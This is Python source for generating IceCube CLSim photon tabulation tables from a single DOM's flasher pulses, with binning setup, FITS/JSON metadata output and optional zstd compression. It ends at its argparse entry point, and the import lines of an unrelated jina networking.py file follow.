            [which('ps'), '-Lo', 'tid', '--no-headers', '%d'%main_pid],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        # BUGFIX: decode bytes output before splitting (Python 3 compat)
        for tid in p.communicate()[0].decode().split():
            tid = tid.strip()
            if tid:
                taskset(tid, tt)
    # only do this on linux
    try:
        # BUGFIX: close the probe handle instead of leaking it
        with open('/proc/cpuinfo'):
            pass
    except IOError:
        return
    # and only if taskset exists
    if not which('taskset'):
        return
    resetter = threading.Thread(target=resetTasksetThreads, args=(getpid(),))
    # Daemonize so a pending affinity reset cannot keep the process alive at
    # interpreter exit (original non-daemon thread blocked exit up to `delay` s)
    resetter.daemon = True
    resetter.start()
@traysegment
def TabulateRetroSources(
    tray,
    name,
    source_gcd_i3_md5,
    binning_kw,
    axes,
    ice_model,
    angular_sensitivity,
    disable_tilt,
    disable_anisotropy,
    hash_val,
    dom_spec,
    dom_x,
    dom_y,
    dom_z,
    dom_zenith,
    dom_azimuth,
    seed,
    n_events,
    tablepath,
    tile=None,
    record_errors=False,
):
    """IceTray segment: emit "retro" flasher pulses from a single DOM
    position/orientation and tabulate the propagated photons with CLSim's
    tabulator module, writing a FITS table (with provenance header) to
    `tablepath`.
    Positions are expected in meters and angles in radians; they are scaled
    by the corresponding I3Units below. All other parameters are forwarded
    unchanged from `generate_clsim_table`.
    """
    # Attach I3Units so downstream icetray modules interpret values correctly
    dom_x = dom_x * I3Units.m
    dom_y = dom_y * I3Units.m
    dom_z = dom_z * I3Units.m
    dom_zenith = dom_zenith * I3Units.rad
    dom_azimuth = dom_azimuth * I3Units.rad
    tablepath = expanduser(expandvars(tablepath))
    random_service = I3GSLRandomService(seed)
    tray.AddModule(
        'I3InfiniteSource', name + 'streams',
        Stream=I3Frame.DAQ
    )
    tray.AddModule(
        'I3MCEventHeaderGenerator',
        name + 'gen_header',
        Year=2009,
        DAQTime=158100000000000000,
        RunNumber=1,
        EventID=1,
        IncrementEventID=True
    )
    flasher_pulse_series_name = 'I3FlasherPulseSeriesMap'
    def reference_source(x, y, z, zenith, azimuth, scale):
        # Builds the I3Particle stored in each frame as 'ReferenceParticle'
        source = I3Particle()
        source.pos = I3Position(x, y, z)
        source.dir = I3Direction(zenith, azimuth)
        source.time = 0.0
        # Following are not used (at least not yet)
        source.type = I3Particle.ParticleType.EMinus
        source.energy = 1.0*scale
        source.length = 0.0
        source.location_type = I3Particle.LocationType.InIce
        return source
    class MakeParticle(I3Module):
        """I3Module that pushes `n_events` DAQ frames, each carrying one retro
        flasher pulse and the reference particle, then requests suspension."""
        def __init__(self, ctx):
            super(MakeParticle, self).__init__(ctx)
            self.AddOutBox('OutBox')
            self.AddParameter('source_function', '', lambda: None)
            self.AddParameter('n_events', '', 100)
            # Populated in Configure() from the icetray parameters above
            self.reference_source = None
            self.n_events = None
            self.emitted_events = None
        def Configure(self):
            self.reference_source = self.GetParameter('source_function')
            self.n_events = self.GetParameter('n_events')
            self.emitted_events = 0
        def DAQ(self, frame):
            pulseseries = I3CLSimFlasherPulseSeries()
            pulse = make_retro_pulse(
                x=dom_x,
                y=dom_y,
                z=dom_z,
                zenith=dom_zenith,
                azimuth=dom_azimuth,
            )
            pulseseries.append(pulse)
            frame[flasher_pulse_series_name] = pulseseries
            frame['ReferenceParticle'] = self.reference_source(
                x=dom_x,
                y=dom_y,
                z=dom_z,
                zenith=dom_zenith,
                azimuth=dom_azimuth,
                scale=1.0,
            )
            self.PushFrame(frame)
            self.emitted_events += 1
            # Stop the tray once the requested number of events is produced
            if self.emitted_events >= self.n_events:
                self.RequestSuspension()
    tray.AddModule(
        MakeParticle,
        source_function=reference_source,
        n_events=n_events,
    )
    # Record table provenance in the FITS header; zero-valued keys act as
    # flags/markers since FITS headers map keys to numbers
    header = OrderedDict(FITSTable.empty_header)
    header['retro_dom_table'] = 0
    header['gcd_i3_md5_{:s}'.format(source_gcd_i3_md5)] = 0
    for n, axname in enumerate(binning_kw.keys()):
        header['ax_{:s}'.format(axname)] = n
        for key, val in binning_kw[axname].items():
            header['{}_{}'.format(axname, key)] = val
        if axname == 't':
            header['t_is_residual_time'] = 1
    header['ice_{:s}'.format(ice_model.replace('.', '_'))] = 0
    header['angsens_{:s}'.format(angular_sensitivity.replace('.', '_'))] = 0
    header['disable_tilt'] = disable_tilt
    header['disable_anisotropy'] = disable_anisotropy
    header['hash_{:s}'.format(hash_val)] = 0
    if tile is not None:
        header['tile'] = tile
    for key, value in dom_spec.items():
        header[key] = value
    header['dom_x'] = dom_x
    header['dom_y'] = dom_y
    header['dom_z'] = dom_z
    header['dom_zenith'] = dom_zenith
    header['dom_azimuth'] = dom_azimuth
    header['seed'] = seed
    header['n_events'] = n_events
    if hasattr(dataclasses, 'I3ModuleGeo'):
        tray.AddModule(
            'I3GeometryDecomposer',
            name + '_decomposeGeometry',
            If=lambda frame: 'I3OMGeoMap' not in frame
        )
    # at the moment the Geant4 paths need to be set, even if it isn't used
    # TODO: fix this
    if I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
        AutoSetGeant4Environment()
    ppc_converter = I3CLSimLightSourceToStepConverterPPC(photonsPerStep=200)
    # Is this even necessary?
    ppc_converter.SetUseCascadeExtension(False)
    particle_parameterizations = GetDefaultParameterizationList(
        ppc_converter,
        muonOnly=False,
    )
    # need a spectrum table in order to pass spectra to OpenCL
    spectrum_table = I3CLSimSpectrumTable()
    particle_parameterizations += GetFlasherParameterizationList(spectrum_table)
    logging.log_debug(
        'number of spectra (1x Cherenkov + Nx flasher): %d'
        % len(spectrum_table),
        unit='clsim',
    )
    opencl_devices = configureOpenCLDevices(
        UseGPUs=False,
        UseCPUs=True,
        OverrideApproximateNumberOfWorkItems=None,
        DoNotParallelize=True,
        UseOnlyDeviceNumber=None,
    )
    medium_properties = parseIceModel(
        expandvars('$I3_SRC/ice-models/resources/models/' + ice_model),
        disableTilt=disable_tilt,
        disableAnisotropy=disable_anisotropy,
    )
    tray.AddModule(
        'I3CLSimTabulatorModule',
        name + '_clsim',
        MCTreeName='', # doesn't apply since we use pulse series
        FlasherPulseSeriesName=flasher_pulse_series_name,
        RandomService=random_service,
        Area=DOM_SURFACE_AREA,
        WavelengthAcceptance=I3CLSimFunctionConstant(1.0), #GetIceCubeDOMAcceptance(domRadius=DOM_RADIUS),
        AngularAcceptance=I3CLSimFunctionConstant(1.0),
        MediumProperties=medium_properties,
        ParameterizationList=particle_parameterizations,
        SpectrumTable=spectrum_table,
        OpenCLDeviceList=opencl_devices,
        PhotonsPerBunch=200,
        EntriesPerPhoton=5000,
        Filename=tablepath,
        RecordErrors=record_errors,
        TableHeader=header,
        Axes=axes,
        SensorNormalize=False
    )
    # Spawn the affinity-reset thread (AMD OpenCL core-pinning workaround)
    unpin_threads()
# TODO: add to CLSim invocation parmeters for detector geometry, bulk ice model, hole
# ice model (i.e. this means angular sensitivity curve in its current implementation,
# though more advanced hole ice models could mean different things), and whether to use
# time difference from direct time
def generate_clsim_table(
    outdir,
    gcd,
    ice_model,
    angular_sensitivity,
    disable_tilt,
    disable_anisotropy,
    string,
    dom,
    n_events,
    seed,
    coordinate_system,
    binning,
    tableset_hash=None,
    tile=None,
    overwrite=False,
    compress=False,
):
    """Generate a CLSim table.

    See wiki.icecube.wisc.edu/index.php/Ice for information about ice models.

    Parameters
    ----------
    outdir : string
    gcd : string
    ice_model : str
        E.g. "spice_mie", "spice_lea", ...
    angular_sensitivity : str
        E.g. "h2-50cm", "9" (which is equivalent to "new25" because, like, duh)
    disable_tilt : bool
        Whether to force no layer tilt in simulation (if tilt is present in
        bulk ice model; otherwise, this has no effect)
    disable_anisotropy : bool
        Whether to force no bulk ice anisotropy (if anisotropy is present in
        bulk ice model; otherwise, this has no effect)
    string : int in [1, 86]
    dom : int in [1, 60]
    n_events : int > 0
        Note that the number of photons is much larger than the number of
        events (related to the "brightness" of the defined source).
    seed : int in [0, 2**32)
        Seed for CLSim's random number generator
    coordinate_system : string in {"spherical", "cartesian"}
        If spherical, base coordinate system is .. ::
            (r, theta, phi, t, costhetadir, (optionally abs)deltaphidir)
        If Cartesian, base coordinate system is .. ::
            (x, y, z, costhetadir, phidir)
        but if any of the coordinate axes are specified to have 0 bins, they
        will be omitted (but the overall order is maintained).
    binning : mapping
        If `coordinate_system` is "spherical", keys should be:
            "n_r_bins"
            "n_t_bins"
            "n_costheta_bins"
            "n_phi_bins"
            "n_costhetadir_bins"
            "n_deltaphidir_bins"
            "r_max"
            "r_power"
            "t_max"
            "t_power"
            "deltaphidir_power"
        If `coordinate_system` is "cartesian", keys should be:
            "n_x_bins"
            "n_y_bins"
            "n_z_bins"
            "n_costhetadir_bins"
            "n_phidir_bins"
            "x_min"
            "x_max"
            "y_min"
            "y_max"
            "z_min"
            "z_max"
    tableset_hash : str, optional
        Specify if the table is a tile used to generate a larger table
    tile : int >= 0, optional
        Specify if the table is a tile used to generate a larger table
    overwrite : bool, optional
        Whether to overwrite an existing table (default: False)
    compress : bool, optional
        Whether to pass the resulting table through zstandard compression
        (default: False)

    Raises
    ------
    ValueError
        If `compress` is True but `zstd` command-line utility cannot be found
    AssertionError, ValueError
        If illegal argument values are passed
    ValueError
        If `overwrite` is False and a table already exists at the target path

    Notes
    -----
    Binnings are as follows:
        * Radial binning is regular in the space of r**(1/r_power), with
          `n_r_bins` spanning from 0 to `r_max` meters.
        * Time binning is regular in the space of t**(1/t_power), with
          `n_t_bins` spanning from 0 to `t_max` nanoseconds.
        * Position zenith angle is binned regularly in the cosine of the zenith
          angle with `n_costhetadir_bins` spanning from -1 to +1.
        * Position azimuth angle is binned regularly, with `n_phi_bins`
          spanning from -pi to pi radians.
        * Photon directionality zenith angle (relative to IceCube coordinate
          system) is binned regularly in cosine-zenith space, with
          `n_costhetadir_bins` spanning from `costhetadir_min` to
          `costhetadir_max`
        * Photon directionality azimuth angle; sometimes assumed to be
          symmetric about line from DOM to the center of the bin, so is binned
          as an absolute value, i.e., from 0 to pi radians. Otherwise, binned
          from -np.pi to +np.pi

    The following are forced upon the above binning specifications (and
    remaining parameters are specified as arguments to the function)
        * t_min = 0 (ns)
        * r_min = 0 (m)
        * costheta_min = -1
        * costheta_max = 1
        * phi_min = -pi (rad)
        * phi_max = pi (rad)
        * costhetadir_min = -1
        * costhetadir_max = 1
        * deltaphidir_min = 0 (rad)
        * deltaphidir_min = pi (rad)
    """
    assert isinstance(n_events, Integral) and n_events > 0
    assert isinstance(seed, Integral) and 0 <= seed < 2**32
    # `tableset_hash` and `tile` must be supplied together or not at all
    assert (
        (tableset_hash is not None and tile is not None)
        or (tableset_hash is None and tile is None)
    )

    n_bins_per_dim = []
    for key, val in binning.items():
        if not key.startswith('n_'):
            continue
        assert isinstance(val, Integral), '{} not an integer'.format(key)
        assert val >= 0, '{} must be >= 0'.format(key)
        n_bins_per_dim.append(val)

    # Note: + 2 accounts for under & overflow bins in each dimension
    # BUGFIX: np.product was removed in NumPy 2.0; np.prod is the supported name
    n_bins = np.prod([n + 2 for n in n_bins_per_dim if n > 0])
    assert n_bins > 0
    #if n_bins > 2**32:
    #    raise ValueError(
    #        'The flattened bin index in CLSim is represented by uint32 which'
    #        ' has a max of 4 294 967 296, but the binning specified comes to'
    #        ' {} bins ({} times too many).'
    #        .format(n_bins, n_bins / 2**32)
    #    )

    ice_model = ice_model.strip()
    angular_sensitivity = angular_sensitivity.strip()
    # For now, hole ice model is hard-coded in our CLSim branch; see
    #   clsim/private/clsim/I3CLSimLightSourceToStepConverterFlasher.cxx
    # in the branch you're using to check that this is correct
    assert angular_sensitivity == 'flasher_p1_0.30_p2_-1'

    gcd_info = extract_gcd(gcd)

    if compress and not any(access(join(path, 'zstd'), X_OK)
                            for path in environ['PATH'].split(pathsep)):
        raise ValueError('`zstd` command not found in path')

    outdir = expand(outdir)
    mkdir(outdir)

    axes = OrderedDict()
    binning_kw = OrderedDict()

    # Note that the actual binning in CLSim is performed using float32, so we
    # first "truncate" all values to that precision. However, the `LinearAxis`
    # function requires Python floats (which are 64 bits), so we have to
    # convert all values to to `float` when passing as kwargs to `LinearAxis`
    # (and presumably the values will be re-truncated to float32 within the
    # CLsim code somewhere). Hopefully following this procedure, the values
    # actually used within CLSim are what we want...? CLSim is stupid.
    ftype = np.float32

    if coordinate_system == 'spherical':
        binning['t_min'] = ftype(0) # ns
        binning['r_min'] = ftype(0) # meters
        costheta_min = ftype(-1.0)
        costheta_max = ftype(1.0)
        # See
        #   clsim/resources/kernels/spherical_coordinates.c.cl
        # in the branch you're using to check that the following are correct
        phi_min = ftype(3.0543261766433716e-01)
        phi_max = ftype(6.5886182785034180e+00)
        binning['costhetadir_min'] = ftype(-1.0)
        binning['costhetadir_max'] = ftype(1.0)
        binning['deltaphidir_min'] = ftype(-3.1808626651763916e+00)
        binning['deltaphidir_max'] = ftype(3.1023228168487549e+00)
        if binning['n_r_bins'] > 0:
            assert isinstance(binning['r_power'], Integral) and binning['r_power'] > 0
            r_binning_kw = OrderedDict([
                ('min', float(binning['r_min'])),
                ('max', float(binning['r_max'])),
                ('n_bins', int(binning['n_r_bins'])),
            ])
            if binning['r_power'] == 1:
                axes['r'] = LinearAxis(**r_binning_kw)
            else:
                r_binning_kw['power'] = int(binning['r_power'])
                axes['r'] = PowerAxis(**r_binning_kw)
            binning_kw['r'] = r_binning_kw
        if binning['n_costheta_bins'] > 0:
            costheta_binning_kw = OrderedDict([
                ('min', float(costheta_min)),
                ('max', float(costheta_max)),
                ('n_bins', int(binning['n_costheta_bins'])),
            ])
            axes['costheta'] = LinearAxis(**costheta_binning_kw)
            binning_kw['costheta'] = costheta_binning_kw
        if binning['n_phi_bins'] > 0:
            phi_binning_kw = OrderedDict([
                ('min', float(phi_min)),
                ('max', float(phi_max)),
                ('n_bins', int(binning['n_phi_bins'])),
            ])
            axes['phi'] = LinearAxis(**phi_binning_kw)
            binning_kw['phi'] = phi_binning_kw
        if binning['n_t_bins'] > 0:
            assert isinstance(binning['t_power'], Integral) and binning['t_power'] > 0
            t_binning_kw = OrderedDict([
                ('min', float(binning['t_min'])),
                ('max', float(binning['t_max'])),
                ('n_bins', int(binning['n_t_bins'])),
            ])
            if binning['t_power'] == 1:
                axes['t'] = LinearAxis(**t_binning_kw)
            else:
                t_binning_kw['power'] = int(binning['t_power'])
                axes['t'] = PowerAxis(**t_binning_kw)
            binning_kw['t'] = t_binning_kw
        if binning['n_costhetadir_bins'] > 0:
            costhetadir_binning_kw = OrderedDict([
                ('min', float(binning['costhetadir_min'])),
                ('max', float(binning['costhetadir_max'])),
                ('n_bins', int(binning['n_costhetadir_bins'])),
            ])
            axes['costhetadir'] = LinearAxis(**costhetadir_binning_kw)
            binning_kw['costhetadir'] = costhetadir_binning_kw
        if binning['n_deltaphidir_bins'] > 0:
            assert (
                isinstance(binning['deltaphidir_power'], Integral)
                and binning['deltaphidir_power'] > 0
            )
            deltaphidir_binning_kw = OrderedDict([
                ('min', float(binning['deltaphidir_min'])),
                ('max', float(binning['deltaphidir_max'])),
                ('n_bins', int(binning['n_deltaphidir_bins'])),
            ])
            if binning['deltaphidir_power'] == 1:
                axes['deltaphidir'] = LinearAxis(**deltaphidir_binning_kw)
            else:
                deltaphidir_binning_kw['power'] = int(binning['deltaphidir_power'])
                axes['deltaphidir'] = PowerAxis(**deltaphidir_binning_kw)
            binning_kw['deltaphidir'] = deltaphidir_binning_kw
    elif coordinate_system == 'cartesian':
        binning['t_min'] = ftype(0) # ns
        binning['costhetadir_min'], binning['costhetadir_max'] = ftype(-1.0), ftype(1.0)
        binning['phidir_min'], binning['phidir_max'] = ftype(-np.pi), ftype(np.pi) # rad
        if binning['n_x_bins'] > 0:
            x_binning_kw = OrderedDict([
                ('min', float(binning['x_min'])),
                ('max', float(binning['x_max'])),
                ('n_bins', int(binning['n_x_bins'])),
            ])
            axes['x'] = LinearAxis(**x_binning_kw)
            binning_kw['x'] = x_binning_kw
        if binning['n_y_bins'] > 0:
            y_binning_kw = OrderedDict([
                ('min', float(binning['y_min'])),
                ('max', float(binning['y_max'])),
                ('n_bins', int(binning['n_y_bins'])),
            ])
            axes['y'] = LinearAxis(**y_binning_kw)
            binning_kw['y'] = y_binning_kw
        if binning['n_z_bins'] > 0:
            z_binning_kw = OrderedDict([
                ('min', float(binning['z_min'])),
                ('max', float(binning['z_max'])),
                ('n_bins', int(binning['n_z_bins'])),
            ])
            axes['z'] = LinearAxis(**z_binning_kw)
            binning_kw['z'] = z_binning_kw
        if binning['n_t_bins'] > 0:
            assert isinstance(binning['t_power'], Integral) and binning['t_power'] > 0
            t_binning_kw = OrderedDict([
                ('min', float(binning['t_min'])),
                ('max', float(binning['t_max'])),
                ('n_bins', int(binning['n_t_bins'])),
            ])
            if binning['t_power'] == 1:
                axes['t'] = LinearAxis(**t_binning_kw)
            else:
                t_binning_kw['power'] = int(binning['t_power'])
                axes['t'] = PowerAxis(**t_binning_kw)
            binning_kw['t'] = t_binning_kw
        if binning['n_costhetadir_bins'] > 0:
            costhetadir_binning_kw = OrderedDict([
                ('min', float(binning['costhetadir_min'])),
                ('max', float(binning['costhetadir_max'])),
                ('n_bins', int(binning['n_costhetadir_bins'])),
            ])
            axes['costhetadir'] = LinearAxis(**costhetadir_binning_kw)
            binning_kw['costhetadir'] = costhetadir_binning_kw
        if binning['n_phidir_bins'] > 0:
            phidir_binning_kw = OrderedDict([
                ('min', float(binning['phidir_min'])),
                ('max', float(binning['phidir_max'])),
                ('n_bins', int(binning['n_phidir_bins'])),
            ])
            axes['phidir'] = LinearAxis(**phidir_binning_kw)
            binning_kw['phidir'] = phidir_binning_kw

    # Re-order the user-specified axes into the canonical order for this
    # coordinate system (axes with 0 bins were never added, so are skipped)
    binning_order = BINNING_ORDER[coordinate_system]
    missing_dims = set(axes.keys()).difference(binning_order)
    if missing_dims:
        raise ValueError(
            '`binning_order` specified is {} but is missing dimension(s) {}'
            .format(binning_order, missing_dims)
        )
    axes_ = OrderedDict()
    binning_kw_ = OrderedDict()
    for dim in binning_order:
        if dim in axes:
            axes_[dim] = axes[dim]
            binning_kw_[dim] = binning_kw[dim]
    axes = axes_
    binning_kw = binning_kw_

    # NOTE: use SphericalAxes even if we're actually binning Cartesian since we
    # don't care how it handles e.g. volumes, and Cartesian isn't implemented
    # in CLSim yet
    axes = SphericalAxes(axes.values())

    # Construct metadata initially with items that will be hashed
    metadata = OrderedDict([
        ('source_gcd_i3_md5', gcd_info['source_gcd_i3_md5']),
        ('coordinate_system', coordinate_system),
        ('binning_kw', binning_kw),
        ('ice_model', ice_model),
        ('angular_sensitivity', angular_sensitivity),
        ('disable_tilt', disable_tilt),
        ('disable_anisotropy', disable_anisotropy)
    ])
    # TODO: this is hard-coded in our branch of CLSim; make parameter & fix here!
    # BUGFIX: the original tested `'t' in binning`, but `binning` only has keys
    # like 'n_t_bins'/'t_min', so the flag was never recorded; the time axis
    # lives in `binning_kw` (consistent with the FITS header written above)
    if 't' in binning_kw:
        metadata['t_is_residual_time'] = True

    if tableset_hash is None:
        hash_val = hash_obj(metadata, fmt='hex')[:8]
        print('derived hash:', hash_val)
    else:
        hash_val = tableset_hash
        print('tableset_hash:', hash_val)
    metadata['hash_val'] = hash_val
    if tile is not None:
        metadata['tile'] = tile

    dom_spec = OrderedDict([('string', string), ('dom', dom)])

    if 'depth_idx' in dom_spec and ('subdet' in dom_spec or 'string' in dom_spec):
        if 'subdet' in dom_spec:
            dom_spec['string'] = dom_spec.pop('subdet')
        string = dom_spec['string']
        depth_idx = dom_spec['depth_idx']
        if isinstance(string, str):
            # BUGFIX: 'subdet' was popped into 'string' above, so reading
            # dom_spec['subdet'] here raised KeyError; also compare the
            # lowercased name so e.g. 'IC'/'DC' are accepted
            subdet = string.lower()
            dom_x, dom_y = 0, 0
            ic_avg_z, dc_avg_z = get_average_dom_z_coords(gcd_info['geo'])
            if subdet == 'ic':
                dom_z = ic_avg_z[depth_idx]
            elif subdet == 'dc':
                dom_z = dc_avg_z[depth_idx]
            else:
                raise ValueError('Unrecognized subdetector {}'.format(subdet))
        else:
            dom_x, dom_y, dom_z = gcd_info['geo'][string - 1, depth_idx]
        metadata['string'] = string
        metadata['depth_idx'] = depth_idx
        if tile is not None:
            raise ValueError(
                'Cannot produce tiled tables using "depth_idx"-style table groupings;'
                ' use "string"/"dom"-style tables instead.'
            )
        clsim_table_fname_proto = CLSIM_TABLE_FNAME_PROTO[1]
        clsim_table_metaname_proto = CLSIM_TABLE_METANAME_PROTO[0]
        print('Subdetector {}, depth index {} (z_avg = {} m)'
              .format(subdet, depth_idx, dom_z))
    elif 'string' in dom_spec and 'dom' in dom_spec:
        string = dom_spec['string']
        dom = dom_spec['dom']
        dom_x, dom_y, dom_z = gcd_info['geo'][string - 1, dom - 1]
        metadata['string'] = string
        metadata['dom'] = dom
        if tile is None:
            clsim_table_fname_proto = CLSIM_TABLE_FNAME_PROTO[2]
            clsim_table_metaname_proto = CLSIM_TABLE_METANAME_PROTO[1]
        else:
            clsim_table_fname_proto = CLSIM_TABLE_TILE_FNAME_PROTO[-1]
            clsim_table_metaname_proto = CLSIM_TABLE_TILE_METANAME_PROTO[-1]
        print('GCD = "{}"\nString {}, dom {}: (x, y, z) = ({}, {}, {}) m'
              .format(gcd, string, dom, dom_x, dom_y, dom_z))
    else:
        raise ValueError('Cannot understand `dom_spec` {}'.format(dom_spec))

    # Until someone figures out DOM tilt and ice column / bubble column / cable
    # orientations for sure, we'll just set DOM orientation to zenith=pi,
    # azimuth=0.
    dom_zenith = np.pi
    dom_azimuth = 0.0

    # Now add other metadata items that are useful but not used for hashing
    metadata['dom_x'] = dom_x
    metadata['dom_y'] = dom_y
    metadata['dom_z'] = dom_z
    metadata['dom_zenith'] = dom_zenith
    metadata['dom_azimuth'] = dom_azimuth
    metadata['seed'] = seed
    metadata['n_events'] = n_events

    metapath = join(outdir, clsim_table_metaname_proto.format(**metadata))
    tablepath = join(outdir, clsim_table_fname_proto.format(**metadata))

    # Save metadata as a JSON file (so it's human-readable by any tool, not
    # just Python--in contrast to e.g. pickle files)
    # BUGFIX: `file()` is a Python-2-only builtin and the handle was never
    # closed; use `open()` in a context manager instead
    with open(metapath, 'w') as meta_file:
        json.dump(metadata, meta_file, sort_keys=False, indent=4)
    print('='*80)
    print('Metadata for the table set was written to\n  "{}"'.format(metapath))
    print('Table will be written to\n  "{}"'.format(tablepath))
    print('='*80)

    exists_at = []
    for fpath in [tablepath, tablepath + '.zst']:
        if isfile(fpath):
            exists_at.append(fpath)
    if exists_at:
        names = ', '.join('"{}"'.format(fp) for fp in exists_at)
        if overwrite:
            print('WARNING! Deleting existing table(s) at ' + names)
            for fpath in exists_at:
                remove(fpath)
        else:
            raise ValueError('Table(s) already exist at {}; not'
                             ' overwriting.'.format(names))
    print('')

    tray = I3Tray()
    tray.AddSegment(
        TabulateRetroSources,
        'TabulateRetroSources',
        source_gcd_i3_md5=gcd_info['source_gcd_i3_md5'],
        binning_kw=binning_kw,
        axes=axes,
        ice_model=ice_model,
        angular_sensitivity=angular_sensitivity,
        disable_tilt=disable_tilt,
        disable_anisotropy=disable_anisotropy,
        hash_val=hash_val,
        dom_spec=dom_spec,
        dom_x=dom_x,
        dom_y=dom_y,
        dom_z=dom_z,
        dom_zenith=dom_zenith,
        dom_azimuth=dom_azimuth,
        seed=seed,
        n_events=n_events,
        tablepath=tablepath,
        tile=tile,
        record_errors=False,
    )

    logging.set_level_for_unit('I3CLSimStepToTableConverter', 'TRACE')
    logging.set_level_for_unit('I3CLSimTabulatorModule', 'DEBUG')
    logging.set_level_for_unit('I3CLSimLightSourceToStepConverterGeant4', 'TRACE')
    logging.set_level_for_unit('I3CLSimLightSourceToStepConverterFlasher', 'TRACE')

    tray.Execute()
    tray.Finish()

    if compress:
        print('Compressing table with zstandard via command line')
        print('  zstd -1 --rm "{}"'.format(tablepath))
        subprocess.check_call(['zstd', '-1', '--rm', tablepath])
        print('done.')
def parse_args(description=__doc__):
    """Parse command line args.

    Returns
    -------
    general_kw : OrderedDict
        Keyword args for `generate_clsim_table` other than the binning spec
    binning : dict
        Binning-specification keyword args (everything not in `general_kw`)
    """
    parser = ArgumentParser(description=description)
    parser.add_argument(
        '--outdir', required=True,
        # NOTE: the arg is required, so the old "(default: ./)" help text was
        # misleading and has been removed
        help='Save table to this directory'
    )
    parser.add_argument(
        '--overwrite', action='store_true',
        help='Overwrite if the table already exists'
    )
    parser.add_argument(
        '--compress', action='store_true',
        help='Compress the table with zstd when complete'
    )
    parser.add_argument(
        '--gcd', required=True
    )
    parser.add_argument(
        '--ice-model', required=True
    )
    parser.add_argument(
        '--angular-sensitivity', required=True
    )
    parser.add_argument(
        '--disable-tilt', action='store_true',
        help='Force no tilt, even if ice model contains tilt'
    )
    parser.add_argument(
        '--disable-anisotropy', action='store_true',
        help='Force no anisotropy, even if ice model contains anisotropy'
    )
    parser.add_argument(
        '--string', type=int, required=True,
        help='String number in [1, 86]'
    )
    parser.add_argument(
        '--dom', type=int, required=True,
        help='''DOM number on string, in [1, 60]'''
    )
    parser.add_argument(
        '--n-events', type=int, required=True,
        help='Number of events to simulate'
    )
    parser.add_argument(
        '--seed', type=int, required=True,
        help='Random seed to use, in range of 32 bit uint: [0, 2**32-1]'
    )

    subparsers = parser.add_subparsers(
        dest='coordinate_system',
        help='''Choose the coordinate system for binning: "spherical" or
        "cartesian"'''
    )

    # -- Spherical (phi optional) + time + directionality binning -- #
    sph_parser = subparsers.add_parser(
        'spherical',
        help='Use spherical binning about the DOM',
    )
    sph_parser.add_argument(
        '--n-r-bins', type=int, required=True,
        help='Number of radial bins'
    )
    sph_parser.add_argument(
        '--n-costheta-bins', type=int, required=True,
        help='Number of costheta (cosine of position zenith angle) bins'
    )
    sph_parser.add_argument(
        '--n-phi-bins', type=int, required=True,
        help='Number of phi (position azimuth) bins'
    )
    sph_parser.add_argument(
        '--n-t-bins', type=int, required=True,
        help='Number of time bins (relative to direct time)'
    )
    sph_parser.add_argument(
        '--n-costhetadir-bins', type=int, required=True,
        help='Number of costhetadir bins'
    )
    sph_parser.add_argument(
        '--n-deltaphidir-bins', type=int, required=True,
        help='''Number of deltaphidir bins (Note: span from 0 to pi; code
        assumes symmetry about 0)'''
    )
    sph_parser.add_argument(
        '--r-max', type=float, required=False,
        help='Radial binning maximum value, in meters'
    )
    sph_parser.add_argument(
        '--r-power', type=int, required=False,
        help='Radial binning is regular in raidus to this power'
    )
    sph_parser.add_argument(
        '--deltaphidir-power', type=int, required=False,
        help='deltaphidir binning is regular in deltaphidir to this power'
    )
    sph_parser.add_argument(
        '--t-max', type=float, required=False,
        help='Time binning maximum value, in nanoseconds'
    )
    sph_parser.add_argument(
        '--t-power', type=int, required=False,
        help='Time binning is regular in time to this power'
    )

    # -- Cartesian + (optional time) + directionality binning -- #
    cart_parser = subparsers.add_parser(
        'cartesian',
        help='Use Cartesian binning in IceCube coord system',
    )
    cart_parser.add_argument(
        '--tableset-hash', required=False,
        help='''Hash for a larger table(set) of which this is one tile (i.e.,
        if --tile is provided)'''
    )
    cart_parser.add_argument(
        '--tile', type=int, required=False,
        help='Tile number; provide if this is a tile in a larger table'
    )
    cart_parser.add_argument(
        '--n-x-bins', type=int, required=True,
        help='Number of x bins'
    )
    cart_parser.add_argument(
        '--n-y-bins', type=int, required=True,
        help='Number of y bins'
    )
    cart_parser.add_argument(
        '--n-z-bins', type=int, required=True,
        help='Number of z bins'
    )
    cart_parser.add_argument(
        '--n-t-bins', type=int, required=True,
        help='Number of time bins (relative to direct time)'
    )
    cart_parser.add_argument(
        '--n-costhetadir-bins', type=int, required=True,
        help='Number of costhetadir bins'
    )
    cart_parser.add_argument(
        '--n-phidir-bins', type=int, required=True,
        help='''Number of phidir bins (Note: span from -pi to pi)'''
    )

    # -- Binning limits -- #
    cart_parser.add_argument(
        '--x-min', type=float, required=False,
        help='x binning minimum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--x-max', type=float, required=False,
        help='x binning maximum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--y-min', type=float, required=False,
        help='y binning minimum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--y-max', type=float, required=False,
        help='y binning maximum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--z-min', type=float, required=False,
        help='z binning minimum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--z-max', type=float, required=False,
        help='z binning maximum value, IceCube coordinate system, in meters'
    )
    cart_parser.add_argument(
        '--t-max', type=float, required=False,
        help='Time binning maximum value, in nanoseconds'
    )
    cart_parser.add_argument(
        '--t-power', type=int, required=False,
        help='Time binning is regular in time to this power'
    )

    all_kw = vars(parser.parse_args())

    # Split the parsed namespace into general kwargs vs. binning kwargs
    general_kw = OrderedDict()
    for key in (
        'outdir',
        'overwrite',
        'compress',
        'gcd',
        'ice_model',
        'angular_sensitivity',
        'disable_tilt',
        'disable_anisotropy',
        'string',
        'dom',
        'n_events',
        'seed',
        'coordinate_system',
        'tableset_hash',
        'tile',
    ):
        # `tableset_hash`/`tile` only exist for the cartesian subcommand
        if key in all_kw:
            general_kw[key] = all_kw.pop(key)
    binning = all_kw
    return general_kw, binning
if __name__ == '__main__':
    # Script entry point: split CLI args into general vs. binning kwargs and
    # run the table generation
    _general_kw, _binning = parse_args()
    generate_clsim_table(binning=_binning, **_general_kw)
|
networking.py | import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import Optional, TYPE_CHECKING
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
